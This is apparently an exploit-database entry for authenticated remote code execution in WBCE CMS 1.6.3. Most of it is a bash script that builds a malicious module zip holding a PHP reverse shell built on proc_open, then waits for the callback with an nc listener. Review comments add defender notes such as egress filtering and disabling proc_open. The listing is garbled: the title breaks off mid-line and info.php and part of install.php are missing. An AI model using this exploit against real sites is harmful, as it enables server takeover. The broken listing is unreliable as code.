WBCE CMS 1.6.3 – Authenticated Remote Code Execution (RCE)

# Exploit Title: WBCE CMS  "
	exit 1
fi

# Pre-flight check: stop unless `which` can locate an `nc` binary.
# Netcat is needed because the last stage of this script starts a listener with it.
if [ -z "$(which nc)" ]; then
	echo "[!] Netcat is not installed."
	exit 1 
fi

# Positional arguments: $1 is kept as the callback address, $2 as the callback port.
# NOTE(review): neither value is validated in the lines visible on this page. $port is
# passed to netcat further down; $ip is presumably written into the generated PHP, but
# that part of the listing was lost in extraction -- confirm against the original advisory.
ip=$1
port=$2

# Start from a clean state: drop any archive or staging directory left by an earlier run,
# then recreate the staging directory that will hold the module files.
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

# The unquoted [*] is a glob pattern, so the shell may expand it if the current
# directory contains a file literally named '*'; the later quoted echo lines do not have this issue.
echo [*] Crafting Payload

cat  shellModule/info.php

EOF

cat  shellModule/install.php
 array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
	if (feof(\$sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof(\$pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

	if (in_array(\$sock, \$read_a)) {
		if (\$debug) printit("SOCK READ");
		\$input = fread(\$sock, \$chunk_size);
		if (\$debug) printit("SOCK: \$input");
		fwrite(\$pipes[0], \$input);
	}

	if (in_array(\$pipes[1], \$read_a)) {
		if (\$debug) printit("STDOUT READ");
		\$input = fread(\$pipes[1], \$chunk_size);
		if (\$debug) printit("STDOUT: \$input");
		fwrite(\$sock, \$input);
	}

	if (in_array(\$pipes[2], \$read_a)) {
		if (\$debug) printit("STDERR READ");
		\$input = fread(\$pipes[2], \$chunk_size);
		if (\$debug) printit("STDERR: \$input");
		fwrite(\$sock, \$input);
	}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
	if (!\$daemon) {
		print "\$string\n";
	}
}

?> 
EOF

# Package the staging directory as a module archive, then remove the staging directory
# so only shellModule.zip remains on disk.
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
# The upload and install step is manual and needs a logged-in WBCE administrator, which
# is why the issue is classed as authenticated. Defender view: module installation by an
# admin account is the event to log and review, and limiting who holds that privilege
# (plus protecting those credentials) is the primary control.
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener

# Blocks until an inbound TCP connection arrives on $port (-l listen, -v verbose,
# -n no DNS lookups, -p port). Defender view: the callback is an outbound connection
# made by the web server's PHP process, so egress filtering on the web host stops it and
# an unexpected outbound session from that process is a detection signal. The generated
# install.php relies on proc_open, so listing proc_open in PHP's disable_functions also
# breaks this payload.
nc -lvnp $port

echo
echo
echo "[*] Done!"
# Incident-response indicator: an installed module called 'Reverse Shell'. The name is
# presumably set in the generated info.php (its contents are missing from this page), so
# treat it as an indicator for the unmodified script only; a module whose install.php
# calls proc_open is the more durable thing to hunt for.
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
            
